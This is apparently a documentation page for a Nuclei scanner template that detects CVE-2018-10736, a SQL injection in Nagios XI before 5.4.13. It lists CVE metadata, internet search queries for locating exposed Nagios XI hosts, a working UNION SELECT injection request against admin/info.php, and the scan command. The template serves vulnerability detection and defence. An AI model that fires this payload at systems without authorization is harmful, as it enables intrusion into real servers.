NagiosXI <= 5.4.12 - SQL injection
ID: CVE-2018-10736
Severity: high
Author: DhiyaneshDK
Tags: cve,cve2018,nagios,sqli
Description
Section titled “Description”A SQL injection issue was discovered in Nagios XI before 5.4.13 via the admin/info.php key1 parameter.
YAML Source
Section titled “YAML Source”id: CVE-2018-10736
info: name: NagiosXI <= 5.4.12 - SQL injection author: DhiyaneshDK severity: high description: | A SQL injection issue was discovered in Nagios XI before 5.4.13 via the admin/info.php key1 parameter. reference: - https://github.com/0ps/pocassistdb - https://github.com/jweny/pocassistdb - https://vulners.com/seebug/SSV:97266 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2018-10736 cwe-id: CWE-89 epss-score: 0.01861 epss-percentile: 0.88359 cpe: cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: nagios product: nagios_xi shodan-query: http.title:"nagios xi" fofa-query: - app="Nagios-XI" - title="nagios xi" - app="nagios-xi" google-query: intitle:"nagios xi" tags: cve,cve2018,nagios,sqlivariables: num: "{{rand_int(2000000000, 2100000000)}}"
http: - method: GET path: - "{{BaseURL}}/nagiosql/admin/info.php?key1=%27%20union%20select%20concat(md5({{num}}))%23"
matchers: - type: word part: body words: - "{{md5(num)}}"# digest: 4a0a0047304502205c473a174b821580b7fd318101efae6e131023037e0ccdc403edddc51d09dae5022100f36ec22f38b4d98857d95f58584169f9669de9a7cc4609a5dbb11fecdfb8583b:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2018/CVE-2018-10736.yaml"